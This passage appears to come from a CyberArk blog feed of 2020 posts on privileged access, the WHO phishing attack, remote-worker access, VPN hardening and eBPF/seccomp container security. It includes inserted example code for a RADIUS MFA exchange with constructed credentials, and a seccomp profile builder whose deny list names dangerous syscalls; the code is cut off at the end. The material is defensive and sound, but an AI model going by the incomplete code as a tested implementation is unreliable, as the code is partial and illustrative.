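    print(decision.policy_yaml)
```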

Typically, credentials are managed centrally by the CyberArk Privileged Access Security Solution and provided to the applications by the CyberArk Application Access Manager’s Dynamic Access Provider, through either CyberArk’s certified Red Hat OpenShift or Pivotal Tile integrations, or as Kubernetes Secrets.

Why Self-Service Approaches Matter

Developers don’t want to work with any solution that takes up unnecessary time – meaning that a secrets management solution won’t be adopted if they’re going to be dependent on security to update the access policies or if they’re forced to write the policies themselves.

If not done correctly, organizations can experience significant developer pushback, poor adoption and either delays in app deployment or apps being deployed that don’t securely access resources. The self-service approach avoids all of this by facilitating developer productivity rather than inhibiting it, becoming a win-win for developers and for security.

Self-service approaches to secrets management not only help security teams build a partnership with developers, but also enable organizations to more rapidly and efficiently ensure the security of their applications. Given these benefits, as enterprises – especially those with large portfolios – make their digital transformation journey, they will likely increasingly turn to self-service approaches that provide developers with an automated way to give applications secure access to sensitive resources.

Discover more strategies for aligning DevOps and security teams and learn about the CyberArk Application Access Manager secrets management solution for enterprises and CyberArk’s open source secrets management solution, Conjur Open Source.

]]>
What the WHO Attack Teaches Us About Redefining Risk https://www.cyberark.com/blog/what-the-who-attack-teaches-us-about-redefining-risk/ Tue, 31 Mar 2020 13:00:03 +0000 https://www.cyberark.com/?p=88137

As governments, organizations and individuals around the world grapple with unprecedented and rapidly evolving circumstances, opportunistic cyber attackers are making moves.

According to Reuters, a group of attackers launched a phishing campaign earlier this month targeting the World Health Organization (WHO). Experts believe the attack was orchestrated by a sophisticated nation-state group with the goal of harvesting credentials used by WHO employees to access critical systems and applications.

Alexander Urbelis, the cybersecurity researcher who first sounded the alarm, explained to InfoRiskToday that the attackers utilized sub-domains in an attempt to compromise WHO’s Active Directory Federated Service, a single sign-on service. He was able to identify from the structure of the URL that the attack targeted the WHO log-in portal and to identify that this was a brand new targeting of the WHO.

While unsuccessful, the attack is one in a string of recent cyber attacks on the agency. WHO Chief Information Security Officer Flavio Aggio told Reuters that the number of attempts to compromise the WHO or impersonate it in order to target others have “more than doubled.”

A New Category of Institutions Under Attack

This surge in attacker activity is impacting public and private organizations alike, particularly those focused on healthcare, medical research and current relief work. For example, cybercriminals posing as the U.S. Centers for Disease Control and Prevention (CDC) sent out phishing emails offering information on COVID-19, reports Bloomberg.

Additionally, the U.K.’s National Crime Agency is investigating an alleged ransomware attack against a drug testing company that develops vaccines, according to The Wall Street Journal. Meanwhile, as attacks against organizations mount, millions of U.S. citizens seeking financial assistance from the new $2 trillion government relief package are ripe targets for stimulus scams, warns the FBI.

This wave of new attacks is particularly concerning as it focuses on a new set of institutions that have not previously been targeted at this scale and with such force. Compounding the issue, most of these organizations are simultaneously facing the gargantuan challenge of supporting and securing a newly remote workforce.

The Hidden, Persistent Problem and Breaking the Cyber Attack Chain

Though some reports of attacks have emerged, many organizations may not yet know that they’ve been targeted and compromised.

Crisis situations can create a vacuum of information that attackers exploit to launch new attacks. They abuse the crisis in hopes that the broader issues will provide a distraction that weakens the usual response. And, while organizations have collectively gotten better and faster at discovering breaches over the years, the global median dwell time before any detection – external or internal – is still 78 days. Unfortunately, 78 days is ample time for attackers to find, access and steal sensitive data and information.

As with the attempted WHO attack, most attackers seek to gain a foothold by stealing credentials as a first step in the cyber attack chain. They often use these credentials to compromise an endpoint such as a desktop, laptop, mobile device or server. From there, they conduct reconnaissance, then begin moving laterally in search of the privileged credentials needed to get into specific systems. Since they’ve acquired legitimate credentials, it’s easy for attackers to move through the network undetected, escalating privileges in search of their target.

To identify the threat, the organization must have a strong handle on what legitimate communications and authentication look like – or the attacker can easily slip under the radar. Then they patiently wait, sometimes completely dormant, while the organization focuses its attention elsewhere. Some attackers exfiltrate sensitive information little by little, while others wait for the perfect moment to deliver a devastating blow. Attackers can wait for as long as they need, so the actual blow may not come until after the current crisis eases.

As this current situation unfolds, we can expect more attacks of this nature on critical infrastructure and assets. Organizations – particularly government agencies, private companies and healthcare providers – need to be hyper-vigilant and redefine how they’re assessing risk in this new normal. Employee education on phishing and other popular endpoint attack methods is critical to prevent attacks from taking hold. But it cannot end there.

Contrary to popular belief, the greatest risk organizations currently face is containing attackers before they can affect or access critical data and assets – not stopping initial attacker infiltration, which is impossible to prevent 100 percent of the time. Managing access to privileged accounts and credentials is an effective way to break the cyber kill chain, minimize the moves a threat actor can make after infiltrating an organization, and ultimately, prevent a data breach or disruption.

To learn more, read “5 Reasons to Prioritize Privileged Access Management (PAM)” or explore our free collection of cybersecurity resources.


]]>
5 Types of Remote Users You Need to Take into Account https://www.cyberark.com/blog/5-types-of-remote-users-you-need-to-take-into-account/ Thu, 26 Mar 2020 13:00:18 +0000 https://www.cyberark.com/?p=88000

The physical location of users matters less and less in how we conduct business in the new normal. Even before COVID-19 changed the way business is done, a 2019 study showed that 62% of people surveyed worked from home at least part of the time. In the same study, 82% of those who worked remotely at least part of the time reported that they planned to either maintain or increase their level of remote work. Further, more than half (51%) of those who did not do any remote work wanted to start. These numbers have surely only gone way up.

One additional thing to keep in mind is that these figures don’t even take into account the number of remote vendors who function like employees by performing essential tasks for the company.  These users often need access to critical systems the same way an employee does. Of course, with greater flexibility for workers comes greater security risks. In order to provision access, organizations often rely on insecure and inefficient methods, typically relying on VPNs to provide secure access.

However, not all remote workers’ privileges are created equal.  Some may require access to just email and a smattering of business applications, while others may need access to critical business applications like payroll, HR and sales and marketing data. External IT service providers performing outsourced help desk support require the same broad access as internal IT providers.

Today, we’ll identify the top five types of remote workers who often require elevated privileges to systems and discuss how privileged access management (PAM) can help organizations provide secure and easy access to critical systems.

1. Remote IT or Security Company Employees

These users include people like domain admins, network admins and others who typically access critical internal systems from inside the office, but are now working from home as the default. When IT or security staff work from outside the office walls, it throws a wrench into security administrators’ day-to-day.

Identifying the precise levels of access needed by remote IT and security employees and implementing least privilege rights to ensure that they’re only accessing what they need is critical. Traditional solutions like VPNs can’t provide the necessary level of granular, application-level access to do this effectively. Assigning this kind of granular access is important as it helps prevent situations like a Windows admin having access to root accounts.

Integrating security tools with the directory service to provide automated, specific access needs to be set up ahead of time so that, in the event of an unplanned spike in remote work, there’s no gap in IT or security functions while secure conditions for working from home are established.

2. Third-Party Hardware and Software Vendors

Third party vendors for hardware and software, including IT Service providers and contracted Help Desk support, often provide remote services and maintenance that require elevated privileges. These types of vendors would typically require admin-level access to perform tasks on any variety of Windows or Linux servers or databases and are called on to perform patching, system updates and more.

They each essentially act as domain-level administrators and, thus, can wreak havoc on the environment if not properly monitored and provisioned. However, identifying these users and accounting for their individual levels of remote vendor access is usually done on a case-by-case basis by administrators, which can take an abundance of time. It’s important to make sure that all of these users are identified and have the correct access provisioned.

3. Supply Chain Vendors

When supporting the production or delivery of goods isn’t the bread and butter of an organization, it’s common to bring in specialized supply chain vendors to help. These remote users often have access to the network in order to monitor inventory in retail or manufacturing organizations. They may also have access to sensitive data related to forecasted output, quality control and other critical systems that could be related to Industrial Control Systems and Operational Technology (ICS/OT) or on-site supply chain processes.

These vendors may not be the first to come to mind because they’re not qualified as administrators, but supply chain vendors have access that could be leveraged in a dangerous way by malicious attackers or become a serious problem due to inadvertent internal misuse.

4. Services Companies

Service companies that perform departmental tasks like legal, PR and payroll may require access to specific business applications in order to be efficient. It’s important to identify these types of users and enforce the principle of least privilege to make sure they don’t gain access to anything outside of their purview or retain access longer than they need it. It wouldn’t make much practical sense to have a legal service company have access to payroll information; all it would do is increase potential risk.

Business critical applications like Customer Relationship Management (CRM), Enterprise Resource Planning (ERP), cloud consoles and more are important for business continuity and operations, but in the wrong hands the data that lives in these applications can be very dangerous. Identifying who has access to these applications is very important and minimizing the ability to move laterally from one business application to the next can be the difference between a major data breach and business as usual.

5. External Consultants

Business and IT consultants will sometimes need privileged access in order to be productive on the projects that they’re contracted to do, but they should only have that access during the time period they’re contracted for. These types of vendors are temporary by nature and often will only require access for days, weeks or months at a time as they perform their duties. However, within that time frame, external consultants will often receive sweeping access to certain areas of the business.

Identifying early on who these consultants are and what type of access they require (to what, and for how long) helps reduce risk and safeguard the business. In addition, an external consultant’s access should be closely monitored and secured while active, and their access should be automatically deprovisioned as soon as their time working for the company concludes.

Imagine this. A consultant is brought on for a three-week project, gets poor feedback and feels slighted in how they are compensated. If they aren’t deprovisioned automatically, it’s possible they could maintain elevated levels of access past the end of their contract and use it to cause irreparable harm to the organization as payback. While this may seem like an unlikely scenario, it’s just one example of the harm elevated access can cause if not monitored and updated regularly.

As more and more companies rely on remote users as a necessity for day-to-day business, it’s important that they understand the various types of users that are logging into their systems from outside their offices and, more importantly, that they are managing, monitoring and securing that access.

While it can feel like an overwhelming task, CyberArk Alero is a SaaS offering that helps organizations provide and provision secure access to remote users accessing critical systems managed by CyberArk. It can be easily deployed across any number of remote users without the need for VPNs, agents or passwords.

]]>
Know Thy Enemy: Threat Analytics Boosts PAM Effectiveness https://www.cyberark.com/blog/know-thy-enemy-threat-analytics-boosts-pam-effectiveness/ Tue, 24 Mar 2020 13:57:20 +0000 https://www.cyberark.com/?p=87934 Threat Analytics

“Every battle is won before it is fought”
― Sun Tzu, The Art of War

The Art of War, Chinese philosopher Sun Tzu’s treatise on military strategy, is one of the most influential texts in modern history, influencing strategic decision-making in military command centers, corporate boardrooms and the locker rooms of iconic sports teams. The book is less about the x’s-and-o’s of individual battles than about the discipline of preparation. “If ignorant both of your enemy and yourself, you are certain to be in peril,” Sun Tzu teaches.

This advice serves as an essential reminder in today’s cybersecurity landscape – preparedness and self-awareness are as crucial to cybersecurity as they are to battle. To account for increasingly sophisticated cyber threats, businesses must pivot away from a reactive, compliance-driven mindset towards a more proactive security-first approach. To avoid the dangers of ignorance, businesses need a constant stream of data and intelligence across their security operations, as they can only prepare for the threats that they understand.

Threat analytics tools that analyze security risks associated with privileged access are powerful weapons for strategic Privileged Access Management (PAM) programs. They are also key to applying Sun Tzu’s advice to modern day cybersecurity and becoming more aware of both enemy cyber attackers and the dangers of unmanaged privileged accounts that could put your organization at risk.

Security teams with a PAM program or those that are looking to implement one should leverage PAM providers’ threat analytics capabilities and look also at the analytics capabilities already in use by their Security and Operations teams.

Since most cyber attacks follow the progression of gaining an initial foothold on the network and then moving laterally to escalate privileges, threat analytics tools provide vital risk reduction capabilities and the foundation for an effective PAM program.

Here’s how threat analytics can help organizations improve their security posture and operational efficiency by better understanding themselves and their enemies.

Keep Unsecured Privileged Accounts Off the Battlefield

The Art of War has an entire chapter dedicated to the importance of understanding the “terrain” on which a battle takes place. In alignment with that concept, well-run PAM programs leverage threat analytics to continuously scan and discover unmanaged privileged accounts both on-premises and in the cloud.

A good place to start is with unmanaged Linux, Unix and Windows accounts. Getting unmanaged accounts under control presents a quick win in terms of quantifiable risk reduction. After unmanaged accounts have been discovered, a PAM solution can automatically onboard these accounts, eliminating time-consuming and error-prone processes.

Gather Intelligence and Shut Down Attacks in Real-Time

Once unmanaged privileged accounts have been identified, threat analytics capabilities provide consistent controls against risky behavior associated with common attack vectors in SaaS, on-premises and IaaS environments. Threat analytics provide vital context on anomalous activity and privileged behavior that help organizations follow Sun Tzu’s advice to “know the enemy and know yourself.”

Even when organizations manage and protect credentials for their hybrid cloud environments, there is still the potential that these credentials could be left exposed in public code repositories or on end users’ systems. Malicious attackers could find these keys and use them to cause harm – like causing business disruption.

Consider that threat analytics in PAM solutions can detect when privileged AWS access keys have been used without having been retrieved from the PAM solution. Recognizing this indicator of potential compromise, the PAM solution can automatically rotate credentials and alert security teams, providing them additional response time. The same capabilities can help defend against credential theft and other attack vectors in on-premises environments as well.

By analyzing data on the usage of privileged accounts through machine learning and artificial intelligence, threat analytics can establish baseline usage patterns in order to detect behavioral anomalies that could signal in-progress attacks. Examples include:

  • Behavior that violates user permissions, such as an employee bypassing the PAM solution to reset a password
  • Unauthorized attempts to escalate privileges, such as an admin granting themselves unnecessary privileges
  • Irregular behavior for a non-human identity, such as an interactive login for a service account
  • Irregular behavior for a human identity, such as a user retrieving an unusual volume of passwords from the credential vault
  • Dormant users suddenly becoming active, such as an inactive employee account resurfacing to access sensitive data
  • Irregular machine usage, such as servers reporting heavy workloads during non-work periods

By detecting these and other anomalies, security teams can rapidly investigate or even automatically respond to and shut down potential attacks, helping them heed Sun Tzu’s advice to “fall like a thunderbolt.”

Integrate Privileged Threat Analytics with Other Security Tools

Integrating PAM solutions with other solutions such as Security Information and Event Management (SIEM) tools, which collect and analyze log data to monitor security events, can augment the value of both. By focusing on the most sensitive infrastructure in an organization and the highest-risk activity, PAM solutions can identify risks that traditional SIEM tools may not.

Sharing information bi-directionally between PAM and SIEM solutions can eliminate information silos and unify threat intelligence across the enterprise. This provides SOC teams the ability to strike quickly and rapidly respond to security events.

Sun Tzu said “Know yourself and you will win all battles.” Threat analytics can help organizations prepare for ongoing battle in the constantly evolving threat landscape by helping to ensure that all privileged accounts are fully managed, monitored and controlled, so that they can understand the behavior of their adversaries and remediate threats in real time.

Curious about how threat analytics fits into an effective PAM strategy? Watch this webinar to learn more.

Five Simple Rules for Implementing VPN for the Remote Workforce https://www.cyberark.com/blog/five-simple-rules-for-implementing-vpn-for-the-remote-workforce/ Mon, 23 Mar 2020 15:46:30 +0000 https://www.cyberark.com/?p=99189

For many employees, the morning work routine looks a lot different than it used to. Instead of heading to the office, they make their coffee, “commute” to their home workspace and connect to a Virtual Private Network (VPN) to access corporate resources and applications.

The VPN is one of the most time-tested, albeit somewhat risky, solutions out there for secure remote access. I call it risky because, if not properly implemented and maintained, attackers might be able to exploit weaknesses to gain privileged access to sensitive systems and data. In fact, some organizations are opting for new ways to connect their remote workforces that eliminate the need for VPNs or agents and help streamline operations and user workflows.

For organizations using VPNs, it’s important that the VPN stack is properly patched, uses the right encryption, and has its traffic patterns and usage continuously monitored. Even more important is ensuring that users logging on to the VPN are verified to a high degree of assurance, that their devices are validated, and that the related privileges and entitlements are in line with the principle of least privilege. Isn’t this starting to sound like the founding principles of Zero Trust security?

[Figure: the three pillars of Zero Trust referred to below: verify users, validate devices, limit access]

Let’s examine five best practices for implementing VPN in the context of these three pillars of Zero Trust security.

Rule # 1: Verifying Users: Make sure the VPN solution supports Multi-factor Authentication (MFA) through RADIUS and/or SAML.

Most VPN solutions support different authentication mechanisms, depending on the type of VPN (site-to-site or remote user). One that supports MFA is RADIUS, in which the VPN server becomes a RADIUS client of a RADIUS server, which in turn is able to perform multi-factor authentication. For example, the CyberArk Idaptive connector software can serve as a RADIUS server as well as an AD proxy, performing the AD authentication and then presenting a second factor such as a mobile authenticator, an OATH OTP or email.

The following figure shows the various steps involved in the RADIUS-based authentication between the RADIUS client and CyberArk Idaptive Connector, which serves as the RADIUS server (among other things).

[Figure: RADIUS authentication flow between the VPN server (RADIUS client) and the CyberArk Idaptive Connector (RADIUS server)]

Another way to integrate a VPN with an external IDP for authentication is through SAML. This is not supported by all VPN vendors, but where it is, there is no need to install a desktop VPN client on the endpoints. Below is an illustration of how this works with Palo Alto Networks’ GlobalProtect solution.

[Figure: SAML-based VPN authentication with Palo Alto Networks GlobalProtect and an external IDP]

So, as you are looking for a VPN solution ask yourself the questions:

  1. Does it support MFA?
  2. Does the solution require a VPN client to be installed on the endpoints? If so, which authentication mechanisms is it able to support? For example, some mechanisms are pushed directly to the authentication provider (AP) for verification from the mechanism, and some require the end-user to interact with the VPN client to enter a code (e.g. OATH OTP code), which is then sent to the AP for verification.
  3. Does the solution support a client-less VPN authentication mechanism such as SAML? This is especially convenient, since the IT administrator then does not have to ensure that every endpoint has the right version of the client installed and can therefore embrace a wider range of endpoints in a secure fashion. Some clients (Cisco AnyConnect is an example) do support an embedded browser, which can then support SAML.

Rule # 2: Limiting Access: Make sure the RADIUS server is able to work with specific attributes to limit access and authorization.

Vendor-specific attributes (VSAs) are necessary if you want to grant users more than one type of access. For example, based on the user’s role, the user may be granted a particular privilege level, thereby limiting access. VSAs may be used in combination with the standard RADIUS-defined attributes. For example, this link shows Cisco’s VSAs.
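To make Rules 1 and 2 concrete, here is an added example of the RADIUS exchange they describe, written for this page rather than taken from CyberArk Idaptive or any VPN vendor. The VPN gateway plays the RADIUS client; a small `MfaRadiusServer` class stands in for the RADIUS server / MFA provider. Packet framing, User-Password hiding and the Response Authenticator follow RFC 2865; the OTP prompt travels as an Access-Challenge carrying a State attribute that the client echoes in its second Access-Request; and on success the server returns a Cisco-AVPair VSA (vendor ID 9, vendor type 1) carrying a privilege level. The shared secret, user record, password and OTP are constructed for the example.

```python
# Added example: RADIUS password + OTP (Access-Challenge) exchange with a VSA on success.
import hashlib
import hmac
import os
import secrets

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
USER_NAME, USER_PASSWORD, REPLY_MESSAGE, STATE, VENDOR_SPECIFIC = 1, 2, 18, 24, 26
CISCO_VENDOR_ID, CISCO_AVPAIR = 9, 1


def attr(kind, value):
    """One attribute: Type, Length (value length + 2 header bytes), Value."""
    return bytes([kind, len(value) + 2]) + value


def cisco_avpair(text):
    """Vendor-Specific attribute wrapping a Cisco-AVPair such as 'shell:priv-lvl=15'."""
    inner = bytes([CISCO_AVPAIR, len(text) + 2]) + text.encode()
    return attr(VENDOR_SPECIFIC, CISCO_VENDOR_ID.to_bytes(4, "big") + inner)


def hide_password(password, secret, authenticator):
    """RFC 2865 section 5.2: XOR each 16-byte chunk with MD5(secret + previous chunk)."""
    data = password.encode()
    data += b"\x00" * (-len(data) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(data), 16):
        chunk = bytes(a ^ b for a, b in zip(data[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + chunk, chunk
    return out


def reveal_password(hidden, secret, authenticator):
    """Inverse of hide_password, as the RADIUS server performs it."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00").decode()


def build_request(ident, authenticator, attrs):
    body = b"".join(attrs)
    return bytes([ACCESS_REQUEST, ident]) + (20 + len(body)).to_bytes(2, "big") + authenticator + body


def build_response(code, request, attrs, secret):
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    body = b"".join(attrs)
    head = bytes([code, request[1]]) + (20 + len(body)).to_bytes(2, "big")
    return head + hashlib.md5(head + request[4:20] + body + secret).digest() + body


def parse(packet):
    code, ident, length = packet[0], packet[1], int.from_bytes(packet[2:4], "big")
    attrs, i = {}, 20
    while i < length:
        kind, alen = packet[i], packet[i + 1]
        if alen < 2:
            raise ValueError("malformed attribute")
        attrs.setdefault(kind, []).append(packet[i + 2:i + alen])
        i += alen
    return code, ident, packet[4:20], attrs


def verify_response(response, request, secret):
    """The client must check the Response Authenticator before trusting the verdict."""
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    if not hmac.compare_digest(expected, response[4:20]):
        raise ValueError("Response Authenticator mismatch: wrong shared secret or tampered reply")


class MfaRadiusServer:
    """Password first; if it checks out, challenge for an OTP bound to a one-time State token."""
    def __init__(self, secret, users):
        self.secret, self.users, self.pending = secret, users, {}

    def handle(self, packet):
        code, _, authenticator, attrs = parse(packet)
        if code != ACCESS_REQUEST or USER_NAME not in attrs or USER_PASSWORD not in attrs:
            return build_response(ACCESS_REJECT, packet, [], self.secret)
        user = attrs[USER_NAME][0].decode()
        submitted = reveal_password(attrs[USER_PASSWORD][0], self.secret, authenticator).encode()
        record = self.users.get(user)
        if STATE in attrs:  # second leg: the OTP answer to an earlier challenge
            challenged = self.pending.pop(attrs[STATE][0], None)  # State is single-use
            if record and challenged == user and hmac.compare_digest(submitted, record["otp"].encode()):
                return build_response(ACCESS_ACCEPT, packet, [cisco_avpair(record["avpair"])], self.secret)
            return build_response(ACCESS_REJECT, packet, [], self.secret)
        if record and hmac.compare_digest(submitted, record["password"].encode()):
            state = secrets.token_bytes(16)
            self.pending[state] = user
            return build_response(ACCESS_CHALLENGE, packet, [attr(REPLY_MESSAGE, b"Enter OTP"), attr(STATE, state)], self.secret)
        return build_response(ACCESS_REJECT, packet, [], self.secret)


def radius_round_trip(server, secret, ident, user, credential, extra):
    """One Access-Request from the VPN gateway and its verified reply, parsed."""
    authenticator = os.urandom(16)
    attrs = [attr(USER_NAME, user.encode()), attr(USER_PASSWORD, hide_password(credential, secret, authenticator))]
    request = build_request(ident, authenticator, attrs + extra)
    response = server.handle(request)
    verify_response(response, request, secret)
    return parse(response)


def vpn_login(server, secret, user, password, otp):
    """VPN gateway (RADIUS client) side. Returns (result code, list of Cisco-AVPairs)."""
    code, _, _, attrs = radius_round_trip(server, secret, 1, user, password, [])
    if code == ACCESS_CHALLENGE:  # prompt the user for the OTP, echo the State back unchanged
        code, _, _, attrs = radius_round_trip(server, secret, 2, user, otp, [attr(STATE, attrs[STATE][0])])
    avpairs = [v[6:].decode() for v in attrs.get(VENDOR_SPECIFIC, []) if int.from_bytes(v[:4], "big") == CISCO_VENDOR_ID]
    return code, avpairs
```

Usage: `server = MfaRadiusServer(b"constructed-shared-secret", {"alice": {"password": "Winter2020!", "otp": "482913", "avpair": "shell:priv-lvl=15"}})` followed by `vpn_login(server, b"constructed-shared-secret", "alice", "Winter2020!", "482913")` yields `(2, ['shell:priv-lvl=15'])`, i.e. Access-Accept plus the VSA the gateway maps to a privilege level; a wrong OTP or password yields `(3, [])`. Two details matter in practice: the State token is consumed on first use so a captured challenge cannot be replayed, and the client rejects any reply whose Response Authenticator does not verify under the shared secret.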

Rule # 3: Verifying Users: The authentication provider (CyberArk Idaptive in our case) is able to support a heterogeneous VPN environment.

Often an organization has multiple VPN vendors with a mix of protocol support for authentication and access control. The RADIUS server/IDP must be able to support different authentication profiles for the different VPN servers (RADIUS clients). For example, if more sensitive resources are accessed through one VPN server, an authentication profile with stronger authentication can be applied to it than to a different VPN server fronting less critical resources.

Rule # 4: Intelligently Limiting Access: The IDP solution is able to offer an adaptive, risk-aware solution.

Even for a single VPN server, the authentication provider must be able to provide a way to detect user behavioral anomalies and present different challenges based on the user’s risk. This is especially critical in the current scenario where most, if not all, workers are going to be remote for the foreseeable future.

Rule # 5: Validating Devices: The endpoint itself is protected by MFA and conditional access.

With users being remote, and possibly using their own devices (BYOD), it is important to grant access only to devices whose users were verified by MFA when logging into the device itself.

[Figure: MFA and conditional access enforced at the endpoint login]

For more information on securing your remote workforce, visit our Risk Distancing Resource Center.

CyberArk Provides Free Subscription to Alero https://www.cyberark.com/blog/cyberark-provides-free-subscription-to-alero/ Wed, 18 Mar 2020 12:30:48 +0000 https://www.cyberark.com/?p=87716

As organizations move quickly to do their part in stopping the spread of COVID-19 people are working remotely more than ever before.  At CyberArk we have taken action to protect the health and safety of our global community of customers, partners and employees – including having our employees across the globe work from home.

It’s not always easy for organizations to move to full remote work, especially having to balance productivity and security. Sudden, unexpected changes in the amount of work being done from home affects the workflows of remote users – especially those requiring privileged access – and most of the time, organizations don’t have the ability to properly scale. Additionally, attackers are working to capitalize on people’s fears and desire for information, which underscores the need to safeguard critical systems and assets.

Utilizing technology to overcome these challenges can help make these trying times a bit easier. Whether that’s making greater use of video chat and conference calling or allowing secure access to internal systems from anywhere, technology is helping business to continue with as little disruption as possible.

Recently we launched a new use case for CyberArk Alero to address the needs of all remote users (employees and vendors) by providing secure remote access to critical systems managed by CyberArk.

Starting today, we’ll be offering qualified customers the use of CyberArk Alero at no cost through the end of May in hopes that it will help ease some of the burden associated with the changing work environment.  There are many ways that we, as individuals and as a company, are working to help our communities during this trying time.  As business continuity plans are being tested, we hope to help organizations keep business running securely while putting the health and safety of all of us first.

For more information or question – please get in touch with us here.

A Message from Our CEO: Working Together in Unprecedented Times https://www.cyberark.com/blog/a-message-from-our-ceo-working-together-in-unprecedented-times/ Tue, 17 Mar 2020 16:28:01 +0000 https://www.cyberark.com/?p=87703

The CyberArk Response to COVID-19

We are living in an unprecedented time as the world quickly adjusts to the rapidly changing dynamics created by COVID-19. During this challenging time, at CyberArk we believe it is more important than ever that we demonstrate our core values, including “Customer First” and “We.”  As a result, we have taken action to protect the health and safety of our global community of customers, partners and employees.

We formed an executive level task force to respond to the COVID-19 situation and are closely monitoring guidance from the World Health Organization (WHO), the CDC (Centers for Disease Control), as well as local authorities to help shape our policies and guidance.

All CyberArk employees, including service and support team members, are fully enabled to work securely from home so that they can support the business continuity strategies of our customers and partners as they change business workflows in their response to COVID-19. Our support team is available to customers 24 hours a day, seven days a week. More information can be found on our technical support page.

We’ve restricted all non-essential business travel for our employees, and established a dedicated CyberArk intranet page to provide employees with up to date guidance and answers to commonly asked questions.

To help our customers protect against emerging threats, the CyberArk Labs team is actively researching how attackers are capitalizing on COVID-19 and we are communicating findings to customers and partners. We have also made CyberArk Alero available through May at no cost to eligible CyberArk customers. Alero can help support our customers’ business by enabling remote employees simple and secure access to critical systems managed by CyberArk.

As our top priority remains the health and safety of all CyberArk event attendees, we have decided to cancel Impact Dallas 2020 in May and instead deliver a virtual event experience (details to be determined).

We will continue to actively monitor the situation globally and if CyberArk becomes aware of any change in the situation that would impact the support, services or products available to CyberArk customers, we will notify impacted customers as soon as practicable.

This is unchartered territory, but we have navigated many economic and geopolitical challenges together as a community. I want to thank our employees for their dedication, flexibility and commitment to uninterrupted customer service. We are committed to doing all that we can to support the safety and well-being of our customers, partners and employees.

 

Udi Mokady

Founder, Chairman & CEO

 

Security with Extended Berkeley Packet Filter and PAM https://www.cyberark.com/blog/security-with-extended-berkeley-packet-filter-and-pam/ Thu, 12 Mar 2020 13:39:03 +0000 https://www.cyberark.com/?p=87469 eBPF and Privileged Access Management (PAM)

Extended Berkeley Packet Filter (eBPF) has been circulating in the developer arena for quite some time. The original BPF was developed nearly three decades ago by US national laboratory researchers as an architecture for packet filtering on Unix hosts.

Companies like Amazon, Google, Facebook and Netflix are leveraging the Linux kernel extension (eBPF) for various network security and monitoring processes. Why? In short, because it’s super easy to implement and it provides a more secure and restricted environment for the development team.

This technology allows for monitoring within the kernel – you can run user-defined code at the kernel level, safely and without ever having to go deep down the stack and write a kernel module.  It’s a tiny virtual machine that exists inside Linux, supporting various monitoring functions within the kernel. The fact that developers are leveraging this is a great thing from a security perspective.  It’s like the dev team writing an open letter:

Dear Security, Ops and the Business, we care about writing secure and attestable code, we just need your backing and tools that enable it.

One common example is tcpdump, which displays the packets (TCP/IP) traversing the network of a given Linux instance. Executing tcpdump requires root or sudo access, primarily because of the Linux capabilities involved (raw socket access). However, the sudo command can provide a false sense of security. In theory, sudo is designed to improve the security around root access, but, in reality, there are many drawbacks to sudo that bring its security capabilities into question.

In many organizations, the individual who requires root access is the same person who configures sudo policies, so there is no separation of duties. Even where separation of duties is in place, the sudoers file is still stored locally, which presents a significant security risk. A user who escalates to root can edit the sudoers file to grant additional permissions, delete logs to cover their tracks and cause significant damage to the business. The end result: no integrity in the data that sudo is collecting.

eBPF in Containerized Environments

Nowadays the use of Linux containers (LXC) is essentially universal. By simple definition, containers are abstractions of physical hardware within the Linux kernel. Leveraging kernel structures such as namespaces and control groups (cgroups), Docker and other container runtimes achieve isolation and abstraction similar to what you get with virtual machines. This logical isolation layer is a good thing for application delivery.

If you’re reading this blog, chances are you understand that containers are ephemeral in nature.  They can be deployed and decommissioned in hours or even minutes, which makes both management and security quite challenging.

The fact that all containers running on the same physical hardware share a single kernel makes the use of eBPF for monitoring and securing applications an extremely useful approach to securing containerized environments. Installing a secure computing mode (seccomp) filter, which is itself expressed as a BPF program, is a best practice that folds in the principle of least privilege to minimize what’s exposed at the kernel level, limiting which system calls a container can make.

CyberArk understands the importance of ensuring that consistent security policies are enforced, which is why we enable our customers to customize their seccomp files to fit their security preferences, allowing them to import these settings directly into containers themselves via Docker Compose (see Figure 1).  Doing this prevents any pre-defined security policies from being changed, which in turn mitigates the risk of a larger-scale attack by limiting an attacker’s ability to make system calls from the container layer.

Figure 1. This is a demonstration of a project which allows CyberArk users to customize their seccomp.
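As an added illustration of the seccomp approach above (example code written for this page, not the CyberArk project shown in Figure 1), the following builds a profile in the JSON format that Docker and Docker Compose accept, evaluates a syscall name the way the resulting filter would, and audits any loaded profile against a list of syscalls that should stay blocked. The allowlist, the must-block list and the architecture list are constructed for the example and are not a complete profile for any real workload.

```python
# Added example: build, evaluate and audit a Docker-style seccomp profile.
import json

DEFAULT_ACTION = "SCMP_ACT_ERRNO"  # deny by default: least privilege at the syscall boundary
ARCHES = ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"]

# Syscalls a web-tier container has no business making (constructed sample list).
MUST_BLOCK = ["mount", "umount2", "ptrace", "bpf", "unshare", "setns", "keyctl",
              "init_module", "finit_module", "kexec_load", "reboot", "swapon"]

# Constructed minimal allowlist for a static HTTP server.
WEB_ALLOW = ["accept4", "bind", "brk", "close", "epoll_create1", "epoll_ctl", "epoll_wait",
             "exit", "exit_group", "fstat", "futex", "getpid", "listen", "mmap", "munmap",
             "openat", "read", "rt_sigaction", "rt_sigprocmask", "setsockopt", "socket", "write"]


def make_profile(allowed, default_action=DEFAULT_ACTION, arches=ARCHES):
    """Return a Docker seccomp profile that allows exactly `allowed` and denies everything else."""
    return {
        "defaultAction": default_action,
        "architectures": list(arches),
        "syscalls": [{"names": sorted(set(allowed)), "action": "SCMP_ACT_ALLOW", "args": []}],
    }


def lookup(profile, syscall):
    """Action the filter built from `profile` takes for `syscall`: first matching rule wins,
    otherwise the default action."""
    for rule in profile["syscalls"]:
        if syscall in rule["names"]:
            return rule["action"]
    return profile["defaultAction"]


def audit(profile, must_block=MUST_BLOCK):
    """Syscalls from `must_block` that the profile would still allow (empty means it passes)."""
    return [s for s in must_block if lookup(profile, s) == "SCMP_ACT_ALLOW"]


def to_json(profile):
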